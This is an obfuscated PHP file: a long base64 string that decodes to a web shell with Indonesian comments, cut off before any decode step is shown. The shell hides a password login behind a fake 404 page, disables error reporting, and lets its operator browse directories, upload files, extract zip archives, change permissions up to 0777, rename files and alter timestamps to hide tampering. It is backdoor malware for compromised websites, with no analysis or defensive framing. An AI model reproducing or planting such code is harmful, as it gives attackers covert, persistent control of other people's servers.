<?php
// Obfuscated by internal obfuscator (base64)
$z = "";
$z .= "JF9fazBfXyA9ICdZJyAuICdtRnpaVF";
$z .= "kwWDJSbFkyOWtaUT09JzsNCiRfX2sx";
$z .= "X18gPSAnYzJWemMybHZibDl6ZEdGeW";
$z .= "RBPT0nOw0KJF9fazJfXyA9ICdhWE56";
$z .= "WlhRPSc7DQokX19rM19fID0gJ2FHVm";
$z .= "haR1Z5JzsNCiRfX2s0X18gPSAnY0dG";
$z .= "emMzZHZjbVJmZG1WeWFXWjUnOw0KDQ";
$z .= "pAZXJyb3JfcmVwb3J0aW5nKDApOw0K";
$z .= "QGluaV9zZXQoJ2Rpc3BsYXlfZXJyb3";
$z .= "JzJywgMCk7DQpAc2V0X3RpbWVfbGlt";
$z .= "aXQoMCk7DQpAaW5pX3NldCgnbWVtb3";
$z .= "J5X2xpbWl0JywgJy0xJyk7DQpAaW5p";
$z .= "X3NldCgnYWxsb3dfdXJsX2ZvcGVuJy";
$z .= "wgMSk7DQpAaW5pX3NldCgnYWxsb3df";
$z .= "dXJsX2luY2x1ZGUnLCAxKTsNCg0KZn";
$z .= "VuY3Rpb24gX19kKCRzKSB7IHJldHVy";
$z .= "biBiYXNlNjRfZGVjb2RlKCRzKTsgfQ";
$z .= "0KDQovLyBQZXJiYWlrYW46IHBhbmdn";
$z .= "aWwgc2Vzc2lvbl9zdGFydCBkZW5nYW";
$z .= "4gY2FyYSB5YW5nIGJlbmFyDQppZiAo";
$z .= "IXNlc3Npb25faWQoKSkgew0KICAgIH";
$z .= "Nlc3Npb25fc3RhcnQoKTsNCn0NCg0K";
$z .= "JF9fcGFzc19oYXNoX18gPSAnJDJhJD";
$z .= "EyJDFnc1R2YlJDcTJvY0d2V3ZwdkY2";
$z .= "VXVvR2MwWWR0dkdnd2J0aXlUUXdZdm";
$z .= "V5bDNFb3E3a2hHJzsNCiRfX2F1dGhf";
$z .= "XyA9IGZhbHNlOw0KDQppZiAoaXNzZX";
$z .= "QoJF9TRVNTSU9OWydfX2F1dGhfXydd";
$z .= "KSAmJiAkX1NFU1NJT05bJ19fYXV0aF";
$z .= "9fJ10gPT09IHRydWUpIHsNCiAgICAk";
$z .= "X19hdXRoX18gPSB0cnVlOw0KfSBlbH";
$z .= "NlaWYgKGlzc2V0KCRfUE9TVFsnX19w";
$z .= "X18nXSkpIHsNCiAgICBpZiAocGFzc3";
$z .= "dvcmRfdmVyaWZ5KCRfUE9TVFsnX19w";
$z .= "X18nXSwgJF9fcGFzc19oYXNoX18pKS";
$z .= "B7DQogICAgICAgICRfU0VTU0lPTlsn";
$z .= "X19hdXRoX18nXSA9IHRydWU7DQogIC";
$z .= "AgICAgIGhlYWRlcigiTG9jYXRpb246";
$z .= "ICIgLiAkX1NFUlZFUlsiUEhQX1NFTE";
$z .= "YiXSk7DQogICAgICAgIGV4aXQ7DQog";
$z .= "ICAgfQ0KfQ0KDQppZiAoISRfX2F1dG";
$z .= "hfXykgew0KICAgIC8vIEhJRERFTiBM";
$z .= "T0dJTiAtIFByZXNzIFBhZ2VEb3duDQ";
$z .= "ogICAgaWYgKCFpc3NldCgkX0dFVFsn";
$z .= "X19sX18nXSkpIHsNCiAgICAgICAgZW";
$z .= "NobyAnPCFET0NUWVBFIGh0bWw+PGh0";
$z .= "bWw+PGhlYWQ+PHRpdGxlPjQwNCBOb3";
$z .= "QgRm91bmQgLjwvdGl0bGU+PHN0eWxl";
$z .= "PmJvZHl7YmFja2dyb3VuZDojZmZmZm";
$z .= "ZmO2NvbG9yOiMwZjA7Zm9udC1mYW1p";
$z .= "bHk6bW9ub3NwYWNlO2hlaWdodDoxMD";
$z .= "B2aDtkaXNwbGF5OmZsZXg7anVzdGlm";
$z .= "eS1jb250ZW50OmNlbnRlcjthbGlnbi";
$z .= "1pdGVtczpjZW50ZXI7bWFyZ2luOjA7";
$z .= "fTwvc3R5bGU+PC9oZWFkPjxib2R5Pj";
$z .= "xkaXY+PC9kaXY+PHNjcmlwdD5kb2N1";
$z .= "bWVudC5hZGRFdmVudExpc3RlbmVyKC";
$z .= "JrZXlkb3duIixlPT57aWYoZS5rZXk9";
$z .= "PT0iUGFnZURvd24iKWxvY2F0aW9uLm";
$z .= "hyZWY9Ij9fX2xfXz0xIjt9KTs8L3Nj";
$z .= "cmlwdD48L2JvZHk+PC9odG1sPic7DQ";
$z .= "ogICAgICAgIGV4aXQ7DQogICAgfQ0K";
$z .= "ICAgIA0KICAgIC8vIExPR0lOIEZPUk";
$z .= "0NCiAgICBlY2hvICc8IURPQ1RZUEUg";
$z .= "aHRtbD48aHRtbD48aGVhZD48dGl0bG";
$z .= "U+TG9naW48L3RpdGxlPjxzdHlsZT5i";
$z .= "b2R5e2JhY2tncm91bmQ6IHVybCgiaH";
$z .= "R0cHM6Ly9pLmliYi5jby9NeXE1QzI3";
$z .= "Qy9VbnRpdGxlZC01LmpwZyIpO2JhY2";
$z .= "tncm91bmQtc2l6ZTogOTAlIDkwJSA7";
$z .= "Y292ZXI7Y29sb3I6I2ZmZjtmb250LW";
$z .= "ZhbWlseTptb25vc3BhY2U7ZGlzcGxh";
$z .= "eTpmbGV4O2p1c3RpZnktY29udGVudD";
$z .= "pjZW50ZXI7YWxpZ24taXRlbXM6Y2Vu";
$z .= "dGVyO2hlaWdodDoxMDB2aDttYXJnaW";
$z .= "46MDt9Zm9ybXtiYWNrZ3JvdW5kOiMy";
$z .= "MjI7cGFkZGluZzozMHB4O2JvcmRlcj";
$z .= "oxcHggc29saWQgIzBmMDtib3JkZXIt";
$z .= "cmFkaXVzOjEwcHg7fWlucHV0LGJ1dH";
$z .= "Rvbnt3aWR0aDoxMDAlO3BhZGRpbmc6";
$z .= "MTBweDttYXJnaW46MTBweCAwO2JhY2";
$z .= "tncm91bmQ6IzAwMDtjb2xvcjojMGYw";
$z .= "O2JvcmRlcjoxcHggc29saWQgIzU1NT";
$z .= "t9YnV0dG9ue2N1cnNvcjpwb2ludGVy";
$z .= "O308L3N0eWxlPjwvaGVhZD48Ym9keT";
$z .= "48Zm9ybSBtZXRob2Q9InBvc3QiPjxo";
$z .= "Mz7iloTvuLvjg4bilZDilZDilIHkuI";
$z .= "Dwn5KlR0FTS0FO4pqTPC9oMz48aW5w";
$z .= "dXQgdHlwZT0icGFzc3dvcmQiIG5hbW";
$z .= "U9Il9fcF9fIiBwbGFjZWhvbGRlcj0i";
$z .= "UGFzc3dvcmQiIHJlcXVpcmVkPjxidX";
$z .= "R0b24gdHlwZT0ic3VibWl0Ij5NZWx1";
$z .= "bmN1cjwvYnV0dG9uPjwvZm9ybT48L2";
$z .= "JvZHk+PC9odG1sPic7DQogICAgZXhp";
$z .= "dDsNCn0NCg0KLy8gPT09PT09PT09PT";
$z .= "09PT09PT09PT0gTUFJTiBTSEVMTCBF";
$z .= "TkdJTkUgPT09PT09PT09PT09PT09PT";
$z .= "09PT0NCiRfX2Rpcl9fID0gaXNzZXQo";
$z .= "JF9HRVRbJ19fZF9fJ10pID8gJF9HRV";
$z .= "RbJ19fZF9fJ10gOiBnZXRjd2QoKTsN";
$z .= "CiRfX2Rpcl9fID0gc3RyX3JlcGxhY2";
$z .= "UoIlxcIiwgIi8iLCAkX19kaXJfXyk7";
$z .= "DQppZiAoIWlzX2RpcigkX19kaXJfXy";
$z .= "kpICRfX2Rpcl9fID0gZ2V0Y3dkKCk7";
$z .= "DQoNCi8vID09PT09PT09PT09PT09PT";
$z .= "09PT09IEhBTkRMRVIgVVBMT0FEIChQ";
$z .= "SU5EQUhLQU4gS0UgQVRBUykgPT09PT";
$z .= "09PT09PT09PT09PT09PT0NCi8vIDYu";
$z .= "IEZJTEUgVVBMT0FEDQppZiAoaXNzZX";
$z .= "QoJF9GSUxFU1snX191cF9fJ10pKSB7";
$z .= "DQogICAgJF9fdGFyZ2V0X18gPSAkX1";
$z .= "9kaXJfXyAuICcvJyAuIGJhc2VuYW1l";
$z .= "KCRfRklMRVNbJ19fdXBfXyddWyduYW";
$z .= "1lJ10pOw0KICAgIGlmIChtb3ZlX3Vw";
$z .= "bG9hZGVkX2ZpbGUoJF9GSUxFU1snX1";
$z .= "91cF9fJ11bJ3RtcF9uYW1lJ10sICRf";
$z .= "X3RhcmdldF9fKSkgew0KICAgICAgIC";
$z .= "BlY2hvICc8ZGl2IHN0eWxlPSJiYWNr";
$z .= "Z3JvdW5kOnJnYmEoMCwwLDAsMC44KT";
$z .= "tjb2xvcjpsaW1lO3BhZGRpbmc6MTBw";
$z .= "eDttYXJnaW46MTBweDtib3JkZXItcm";
$z .= "FkaXVzOjVweDtib3JkZXItbGVmdDo0";
$z .= "cHggc29saWQgbGltZTsiPuKchSBVcG";
$z .= "xvYWRlZDogJyAuIGJhc2VuYW1lKCRf";
$z .= "X3RhcmdldF9fKSAuICc8L2Rpdj4nOw";
$z .= "0KICAgIH0gZWxzZSB7DQogICAgICAg";
$z .= "IGVjaG8gJzxkaXYgc3R5bGU9ImJhY2";
$z .= "tncm91bmQ6cmdiYSgwLDAsMCwwLjgp";
$z .= "O2NvbG9yOiNmZjU1NTU7cGFkZGluZz";
$z .= "oxMHB4O21hcmdpbjoxMHB4O2JvcmRl";
$z .= "ci1yYWRpdXM6NXB4O2JvcmRlci1sZW";
$z .= "Z0OjRweCBzb2xpZCByZWQ7Ij7inYwg";
$z .= "VXBsb2FkIGdhZ2FsISBQZXJpa3NhIH";
$z .= "Blcm1pc3Npb24gZm9sZGVyLjwvZGl2";
$z .= "Pic7DQogICAgfQ0KfQ0KDQovLyA0Li";
$z .= "BVUExPQUQgJiBFWFRSQUNUIFpJUA0K";
$z .= "aWYgKGlzc2V0KCRfRklMRVNbJ19fem";
$z .= "lwX18nXSkpIHsNCiAgICBpZiAoY2xh";
$z .= "c3NfZXhpc3RzKCdaaXBBcmNoaXZlJy";
$z .= "kpIHsNCiAgICAgICAgJF9femlwX18g";
$z .= "PSBuZXcgWmlwQXJjaGl2ZTsNCiAgIC";
$z .= "AgICAgaWYgKCRfX3ppcF9fLT5vcGVu";
$z .= "KCRfRklMRVNbJ19femlwX18nXVsndG";
$z .= "1wX25hbWUnXSkgPT09IFRSVUUpIHsN";
$z .= "CiAgICAgICAgICAgICRfX3ppcF9fLT";
$z .= "5leHRyYWN0VG8oJF9fZGlyX18pOw0K";
$z .= "ICAgICAgICAgICAgJF9femlwX18tPm";
$z .= "Nsb3NlKCk7DQogICAgICAgICAgICBl";
$z .= "Y2hvICc8ZGl2IHN0eWxlPSJiYWNrZ3";
$z .= "JvdW5kOnJnYmEoMCwwLDAsMC44KTtj";
$z .= "b2xvcjpsaW1lO3BhZGRpbmc6MTBweD";
$z .= "ttYXJnaW46MTBweDtib3JkZXItcmFk";
$z .= "aXVzOjVweDtib3JkZXItbGVmdDo0cH";
$z .= "ggc29saWQgbGltZTsiPuKchSBaSVAg";
$z .= "ZXh0cmFjdGVkOiAnIC4gJF9GSUxFU1";
$z .= "snX196aXBfXyddWyduYW1lJ10gLiAn";
$z .= "PC9kaXY+JzsNCiAgICAgICAgfSBlbH";
$z .= "NlIHsNCiAgICAgICAgICAgIGVjaG8g";
$z .= "JzxkaXYgc3R5bGU9ImJhY2tncm91bm";
$z .= "Q6cmdiYSgwLDAsMCwwLjgpO2NvbG9y";
$z .= "OiNmZjU1NTU7cGFkZGluZzoxMHB4O2";
$z .= "1hcmdpbjoxMHB4O2JvcmRlci1yYWRp";
$z .= "dXM6NXB4O2JvcmRlci1sZWZ0OjRweC";
$z .= "Bzb2xpZCByZWQ7Ij7inYwgR2FnYWwg";
$z .= "bWVtYnVrYSBaSVAgZmlsZTwvZGl2Pi";
$z .= "c7DQogICAgICAgIH0NCiAgICB9IGVs";
$z .= "c2Ugew0KICAgICAgICBlY2hvICc8ZG";
$z .= "l2IHN0eWxlPSJiYWNrZ3JvdW5kOnJn";
$z .= "YmEoMCwwLDAsMC44KTtjb2xvcjojZm";
$z .= "Y1NTU1O3BhZGRpbmc6MTBweDttYXJn";
$z .= "aW46MTBweDtib3JkZXItcmFkaXVzOj";
$z .= "VweDtib3JkZXItbGVmdDo0cHggc29s";
$z .= "aWQgcmVkOyI+4p2MIFppcEFyY2hpdm";
$z .= "UgdGlkYWsgdGVyc2VkaWE8L2Rpdj4n";
$z .= "Ow0KICAgIH0NCn0NCg0KLy8gPT09PT";
$z .= "09PT09PT09PT09PT09PT0gRkVBVFVS";
$z .= "RSBIQU5ETEVSUyA9PT09PT09PT09PT";
$z .= "09PT09PT09PQ0KLy8gMS4gQ0hNT0Qg";
$z .= "RkVBVFVSRQ0KaWYgKGlzc2V0KCRfR0";
$z .= "VUWydfX2NobW9kX18nXSkpIHsNCiAg";
$z .= "ICAkX190YXJnZXRfXyA9ICRfX2Rpcl";
$z .= "9fIC4gJy8nIC4gYmFzZW5hbWUoJF9H";
$z .= "RVRbJ19fY2htb2RfXyddKTsNCiAgIC";
$z .= "BpZiAoZmlsZV9leGlzdHMoJF9fdGFy";
$z .= "Z2V0X18pKSB7DQogICAgICAgIGlmIC";
$z .= "hpc3NldCgkX1BPU1RbJ19fbW9kZV9f";
$z .= "J10pKSB7DQogICAgICAgICAgICAkX1";
$z .= "9tb2RlX18gPSBvY3RkZWMoJF9QT1NU";
$z .= "WydfX21vZGVfXyddKTsNCiAgICAgIC";
$z .= "AgICAgIGlmIChjaG1vZCgkX190YXJn";
$z .= "ZXRfXywgJF9fbW9kZV9fKSkgew0KIC";
$z .= "AgICAgICAgICAgICAgIGVjaG8gJzxk";
$z .= "aXYgc3R5bGU9ImJhY2tncm91bmQ6cm";
$z .= "diYSgwLDAsMCwwLjgpO2NvbG9yOmxp";
$z .= "bWU7cGFkZGluZzoxMHB4O21hcmdpbj";
$z .= "oxMHB4O2JvcmRlci1yYWRpdXM6NXB4";
$z .= "O2JvcmRlci1sZWZ0OjRweCBzb2xpZC";
$z .= "BsaW1lOyI+4pyFIENobW9kIHN1Y2Nl";
$z .= "c3M6ICcgLiBkZWNvY3QoJF9fbW9kZV";
$z .= "9fKSAuICc8L2Rpdj4nOw0KICAgICAg";
$z .= "ICAgICAgfQ0KICAgICAgICB9IGVsc2";
$z .= "Ugew0KICAgICAgICAgICAgJF9fY3Vy";
$z .= "cmVudF9fID0gc3Vic3RyKHNwcmludG";
$z .= "YoJyVvJywgZmlsZXBlcm1zKCRfX3Rh";
$z .= "cmdldF9fKSksIC00KTsNCiAgICAgIC";
$z .= "AgICAgIGVjaG8gJzxkaXYgc3R5bGU9";
$z .= "ImJhY2tncm91bmQ6cmdiYSgwLDAsMC";
$z .= "wwLjkpO3BhZGRpbmc6MjBweDttYXJn";
$z .= "aW46MjBweDtib3JkZXItcmFkaXVzOj";
$z .= "EwcHg7Ym9yZGVyOjJweCBzb2xpZCBn";
$z .= "b2xkOyI+DQogICAgICAgICAgICAgIC";
$z .= "AgICAgIDxoMyBzdHlsZT0iY29sb3I6";
$z .= "Z29sZDttYXJnaW4tdG9wOjA7Ij7wn5";
$z .= "SnIENITU9EOiAnIC4gYmFzZW5hbWUo";
$z .= "JF9fdGFyZ2V0X18pIC4gJzwvaDM+DQ";
$z .= "ogICAgICAgICAgICAgICAgICAgIDxm";
$z .= "b3JtIG1ldGhvZD0icG9zdCI+DQogIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICA8";
$z .= "cCBzdHlsZT0iY29sb3I6I2NjYzsiPk";
$z .= "N1cnJlbnQ6IDxzdHJvbmcgc3R5bGU9";
$z .= "ImNvbG9yOmxpbWU7Ij4nIC4gJF9fY3";
$z .= "VycmVudF9fIC4gJzwvc3Ryb25nPjwv";
$z .= "cD4NCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgIDxzZWxlY3QgbmFtZT0iX19t";
$z .= "b2RlX18iIHN0eWxlPSJ3aWR0aDoxMD";
$z .= "AlO3BhZGRpbmc6MTBweDtiYWNrZ3Jv";
$z .= "dW5kOiMxMTE7Y29sb3I6IzBmMDtib3";
$z .= "JkZXI6MXB4IHNvbGlkICM1NTU7bWFy";
$z .= "Z2luOjEwcHggMDsiPg0KICAgICAgIC";
$z .= "AgICAgICAgICAgICAgICAgICAgIDxv";
$z .= "cHRpb24gdmFsdWU9IjA2NDQiPjA2ND";
$z .= "QgKC1ydy1yLS1yLS0pIEZpbGU8L29w";
$z .= "dGlvbj4NCiAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICA8b3B0aW9uIHZh";
$z .= "bHVlPSIwNzU1Ij4wNzU1ICgtcnd4ci";
$z .= "14ci14KSBFeGVjdXRhYmxlPC9vcHRp";
$z .= "b24+DQogICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICAgPG9wdGlvbiB2YWx1";
$z .= "ZT0iMDc3NyI+MDc3NyAoLXJ3eHJ3eH";
$z .= "J3eCkgRnVsbCBBY2Nlc3M8L29wdGlv";
$z .= "bj4NCiAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgICA8b3B0aW9uIHZhbHVl";
$z .= "PSIwNzAwIj4wNzAwICgtcnd4LS0tLS";
$z .= "0tKSBPd25lciBPbmx5PC9vcHRpb24+";
$z .= "DQogICAgICAgICAgICAgICAgICAgIC";
$z .= "AgICAgICAgPG9wdGlvbiB2YWx1ZT0i";
$z .= "MDQ0NCI+MDQ0NCAoLXItLXItLXItLS";
$z .= "kgUmVhZCBPbmx5PC9vcHRpb24+DQog";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "A8L3NlbGVjdD4NCiAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgIDxpbnB1dCB0eX";
$z .= "BlPSJ0ZXh0IiBuYW1lPSJfX2N1c3Rv";
$z .= "bV9fIiBwbGFjZWhvbGRlcj0iQ3VzdG";
$z .= "9tIChlLmcuLCAwNzU1KSIgc3R5bGU9";
$z .= "IndpZHRoOjEwMCU7cGFkZGluZzoxMH";
$z .= "B4O2JhY2tncm91bmQ6IzExMTtjb2xv";
$z .= "cjojMGYwO2JvcmRlcjoxcHggc29saW";
$z .= "QgIzU1NTsiPg0KICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICAgPGJyPjxicj4NCi";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "IDxidXR0b24gdHlwZT0ic3VibWl0Ii";
$z .= "BzdHlsZT0iYmFja2dyb3VuZDpnb2xk";
$z .= "O2NvbG9yOiMwMDA7cGFkZGluZzoxMH";
$z .= "B4IDIwcHg7Ym9yZGVyOm5vbmU7Ym9y";
$z .= "ZGVyLXJhZGl1czo1cHg7Y3Vyc29yOn";
$z .= "BvaW50ZXI7Zm9udC13ZWlnaHQ6Ym9s";
$z .= "ZDsiPkFwcGx5IENobW9kPC9idXR0b2";
$z .= "4+DQogICAgICAgICAgICAgICAgICAg";
$z .= "ICAgICA8YSBocmVmPSI/X19kX189Jy";
$z .= "AuIHVybGVuY29kZSgkX19kaXJfXykg";
$z .= "LiAnIiBzdHlsZT0iY29sb3I6I2NjYz";
$z .= "ttYXJnaW4tbGVmdDoxMHB4OyI+Q2Fu";
$z .= "Y2VsPC9hPg0KICAgICAgICAgICAgIC";
$z .= "AgICAgICA8L2Zvcm0+DQogICAgICAg";
$z .= "ICAgICAgICAgICA8L2Rpdj4nOw0KIC";
$z .= "AgICAgICAgICAgZXhpdDsNCiAgICAg";
$z .= "ICAgfQ0KICAgIH0NCn0NCg0KLy8gMi";
$z .= "4gUkVOQU1FIEZFQVRVUkUNCmlmIChp";
$z .= "c3NldCgkX0dFVFsnX19yZW5hbWVfXy";
$z .= "ddKSkgew0KICAgICRfX3RhcmdldF9f";
$z .= "ID0gJF9fZGlyX18gLiAnLycgLiBiYX";
$z .= "NlbmFtZSgkX0dFVFsnX19yZW5hbWVf";
$z .= "XyddKTsNCiAgICBpZiAoZmlsZV9leG";
$z .= "lzdHMoJF9fdGFyZ2V0X18pKSB7DQog";
$z .= "ICAgICAgIGlmIChpc3NldCgkX1BPU1";
$z .= "RbJ19fbmV3bmFtZV9fJ10pKSB7DQog";
$z .= "ICAgICAgICAgICAkX19uZXdfXyA9IC";
$z .= "RfX2Rpcl9fIC4gJy8nIC4gJF9QT1NU";
$z .= "WydfX25ld25hbWVfXyddOw0KICAgIC";
$z .= "AgICAgICAgaWYgKHJlbmFtZSgkX190";
$z .= "YXJnZXRfXywgJF9fbmV3X18pKSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgZWNobyAn";
$z .= "PGRpdiBzdHlsZT0iYmFja2dyb3VuZD";
$z .= "pyZ2JhKDAsMCwwLDAuOCk7Y29sb3I6";
$z .= "bGltZTtwYWRkaW5nOjEwcHg7bWFyZ2";
$z .= "luOjEwcHg7Ym9yZGVyLXJhZGl1czo1";
$z .= "cHg7Ym9yZGVyLWxlZnQ6NHB4IHNvbG";
$z .= "lkIGN5YW47Ij7inIUgUmVuYW1lIHN1";
$z .= "Y2Nlc3MhPC9kaXY+JzsNCiAgICAgIC";
$z .= "AgICAgICAgICAvLyBSZWRpcmVjdCB1";
$z .= "bnR1ayByZWZyZXNoIGhhbGFtYW4NCi";
$z .= "AgICAgICAgICAgICAgICBlY2hvICc8";
$z .= "c2NyaXB0PmxvY2F0aW9uLmhyZWY9Ij";
$z .= "9fX2RfXz0nIC4gdXJsZW5jb2RlKCRf";
$z .= "X2Rpcl9fKSAuICciOzwvc2NyaXB0Pi";
$z .= "c7DQogICAgICAgICAgICAgICAgZXhp";
$z .= "dDsNCiAgICAgICAgICAgIH0NCiAgIC";
$z .= "AgICAgfSBlbHNlIHsNCiAgICAgICAg";
$z .= "ICAgICRfX2N1cnJlbnRfXyA9IGJhc2";
$z .= "VuYW1lKCRfX3RhcmdldF9fKTsNCiAg";
$z .= "ICAgICAgICAgIGVjaG8gJzxkaXYgc3";
$z .= "R5bGU9ImJhY2tncm91bmQ6cmdiYSgw";
$z .= "LDAsMCwwLjkpO3BhZGRpbmc6MjBweD";
$z .= "ttYXJnaW46MjBweDtib3JkZXItcmFk";
$z .= "aXVzOjEwcHg7Ym9yZGVyOjJweCBzb2";
$z .= "xpZCBjeWFuOyI+DQogICAgICAgICAg";
$z .= "ICAgICAgICAgIDxoMyBzdHlsZT0iY2";
$z .= "9sb3I6Y3lhbjttYXJnaW4tdG9wOjA7";
$z .= "Ij7wn5OdIFJFTkFNRTogJyAuICRfX2";
$z .= "N1cnJlbnRfXyAuICc8L2gzPg0KICAg";
$z .= "ICAgICAgICAgICAgICAgICA8Zm9ybS";
$z .= "BtZXRob2Q9InBvc3QiPg0KICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICAgPGlucH";
$z .= "V0IHR5cGU9InRleHQiIG5hbWU9Il9f";
$z .= "bmV3bmFtZV9fIiB2YWx1ZT0iJyAuIC";
$z .= "RfX2N1cnJlbnRfXyAuICciIHN0eWxl";
$z .= "PSJ3aWR0aDoxMDAlO3BhZGRpbmc6MT";
$z .= "BweDtiYWNrZ3JvdW5kOiMxMTE7Y29s";
$z .= "b3I6IzBmMDtib3JkZXI6MXB4IHNvbG";
$z .= "lkICM1NTU7bWFyZ2luOjEwcHggMDsi";
$z .= "IHJlcXVpcmVkPg0KICAgICAgICAgIC";
$z .= "AgICAgICAgICAgICAgPGJyPjxicj4N";
$z .= "CiAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgIDxidXR0b24gdHlwZT0ic3VibWl0";
$z .= "IiBzdHlsZT0iYmFja2dyb3VuZDpjeW";
$z .= "FuO2NvbG9yOiMwMDA7cGFkZGluZzox";
$z .= "MHB4IDIwcHg7Ym9yZGVyOm5vbmU7Ym";
$z .= "9yZGVyLXJhZGl1czo1cHg7Y3Vyc29y";
$z .= "OnBvaW50ZXI7Zm9udC13ZWlnaHQ6Ym";
$z .= "9sZDsiPlJlbmFtZTwvYnV0dG9uPg0K";
$z .= "ICAgICAgICAgICAgICAgICAgICAgIC";
$z .= "AgPGEgaHJlZj0iP19fZF9fPScgLiB1";
$z .= "cmxlbmNvZGUoJF9fZGlyX18pIC4gJy";
$z .= "Igc3R5bGU9ImNvbG9yOiNjY2M7bWFy";
$z .= "Z2luLWxlZnQ6MTBweDsiPkNhbmNlbD";
$z .= "wvYT4NCiAgICAgICAgICAgICAgICAg";
$z .= "ICAgPC9mb3JtPg0KICAgICAgICAgIC";
$z .= "AgICAgICAgPC9kaXY+JzsNCiAgICAg";
$z .= "ICAgICAgIGV4aXQ7DQogICAgICAgIH";
$z .= "0NCiAgICB9DQp9DQoNCi8vIDMuIEVE";
$z .= "SVQgVElNRVNUQU1QIEZFQVRVUkUNCm";
$z .= "lmIChpc3NldCgkX0dFVFsnX190b3Vj";
$z .= "aF9fJ10pKSB7DQogICAgJF9fdGFyZ2";
$z .= "V0X18gPSAkX19kaXJfXyAuICcvJyAu";
$z .= "IGJhc2VuYW1lKCRfR0VUWydfX3RvdW";
$z .= "NoX18nXSk7DQogICAgaWYgKGZpbGVf";
$z .= "ZXhpc3RzKCRfX3RhcmdldF9fKSkgew";
$z .= "0KICAgICAgICBpZiAoaXNzZXQoJF9Q";
$z .= "T1NUWydfX2RhdGV0aW1lX18nXSkpIH";
$z .= "sNCiAgICAgICAgICAgICRfX2RhdGV0";
$z .= "aW1lX18gPSBzdHJ0b3RpbWUoJF9QT1";
$z .= "NUWydfX2RhdGV0aW1lX18nXSk7DQog";
$z .= "ICAgICAgICAgICBpZiAodG91Y2goJF";
$z .= "9fdGFyZ2V0X18sICRfX2RhdGV0aW1l";
$z .= "X18sICRfX2RhdGV0aW1lX18pKSB7DQ";
$z .= "ogICAgICAgICAgICAgICAgZWNobyAn";
$z .= "PGRpdiBzdHlsZT0iYmFja2dyb3VuZD";
$z .= "pyZ2JhKDAsMCwwLDAuOCk7Y29sb3I6";
$z .= "bGltZTtwYWRkaW5nOjEwcHg7bWFyZ2";
$z .= "luOjEwcHg7Ym9yZGVyLXJhZGl1czo1";
$z .= "cHg7Ym9yZGVyLWxlZnQ6NHB4IHNvbG";
$z .= "lkIG1hZ2VudGE7Ij7inIUgVGltZXN0";
$z .= "YW1wIHVwZGF0ZWQ6ICcgLiBkYXRlKC";
$z .= "dZLW0tZCBIOmk6cycsICRfX2RhdGV0";
$z .= "aW1lX18pIC4gJzwvZGl2Pic7DQogIC";
$z .= "AgICAgICAgICAgICAgZWNobyAnPHNj";
$z .= "cmlwdD5sb2NhdGlvbi5ocmVmPSI/X1";
$z .= "9kX189JyAuIHVybGVuY29kZSgkX19k";
$z .= "aXJfXykgLiAnIjs8L3NjcmlwdD4nOw";
$z .= "0KICAgICAgICAgICAgICAgIGV4aXQ7";
$z .= "DQogICAgICAgICAgICB9DQogICAgIC";
$z .= "AgIH0gZWxzZSB7DQogICAgICAgICAg";
$z .= "ICAkX19jdXJyZW50X18gPSBmaWxlbX";
$z .= "RpbWUoJF9fdGFyZ2V0X18pOw0KICAg";
$z .= "ICAgICAgICAgJF9fY3VycmVudF9kYX";
$z .= "RlX18gPSBkYXRlKCdZLW0tZFxUSDpp";
$z .= "JywgJF9fY3VycmVudF9fKTsNCiAgIC";
$z .= "AgICAgICAgIGVjaG8gJzxkaXYgc3R5";
$z .= "bGU9ImJhY2tncm91bmQ6cmdiYSgwLD";
$z .= "AsMCwwLjkpO3BhZGRpbmc6MjBweDtt";
$z .= "YXJnaW46MjBweDtib3JkZXItcmFkaX";
$z .= "VzOjEwcHg7Ym9yZGVyOjJweCBzb2xp";
$z .= "ZCBtYWdlbnRhOyI+DQogICAgICAgIC";
$z .= "AgICAgICAgICAgIDxoMyBzdHlsZT0i";
$z .= "Y29sb3I6bWFnZW50YTttYXJnaW4tdG";
$z .= "9wOjA7Ij7wn5WSIEVESVQgVElNRVNU";
$z .= "QU1QOiAnIC4gYmFzZW5hbWUoJF9fdG";
$z .= "FyZ2V0X18pIC4gJzwvaDM+DQogICAg";
$z .= "ICAgICAgICAgICAgICAgIDxmb3JtIG";
$z .= "1ldGhvZD0icG9zdCI+DQogICAgICAg";
$z .= "ICAgICAgICAgICAgICAgICA8cCBzdH";
$z .= "lsZT0iY29sb3I6I2NjYzsiPkN1cnJl";
$z .= "bnQ6IDxzdHJvbmcgc3R5bGU9ImNvbG";
$z .= "9yOmxpbWU7Ij4nIC4gZGF0ZSgnWS1t";
$z .= "LWQgSDppOnMnLCAkX19jdXJyZW50X1";
$z .= "8pIC4gJzwvc3Ryb25nPjwvcD4NCiAg";
$z .= "ICAgICAgICAgICAgICAgICAgICAgID";
$z .= "xpbnB1dCB0eXBlPSJkYXRldGltZS1s";
$z .= "b2NhbCIgbmFtZT0iX19kYXRldGltZV";
$z .= "9fIiB2YWx1ZT0iJyAuICRfX2N1cnJl";
$z .= "bnRfZGF0ZV9fIC4gJyIgc3R5bGU9In";
$z .= "dpZHRoOjEwMCU7cGFkZGluZzoxMHB4";
$z .= "O2JhY2tncm91bmQ6IzExMTtjb2xvcj";
$z .= "ojMGYwO2JvcmRlcjoxcHggc29saWQg";
$z .= "IzU1NTttYXJnaW46MTBweCAwOyIgcm";
$z .= "VxdWlyZWQ+DQogICAgICAgICAgICAg";
$z .= "ICAgICAgICAgICA8YnI+PGJyPg0KIC";
$z .= "AgICAgICAgICAgICAgICAgICAgICAg";
$z .= "PGJ1dHRvbiB0eXBlPSJzdWJtaXQiIH";
$z .= "N0eWxlPSJiYWNrZ3JvdW5kOm1hZ2Vu";
$z .= "dGE7Y29sb3I6IzAwMDtwYWRkaW5nOj";
$z .= "EwcHggMjBweDtib3JkZXI6bm9uZTti";
$z .= "b3JkZXItcmFkaXVzOjVweDtjdXJzb3";
$z .= "I6cG9pbnRlcjtmb250LXdlaWdodDpi";
$z .= "b2xkOyI+VXBkYXRlIFRpbWVzdGFtcD";
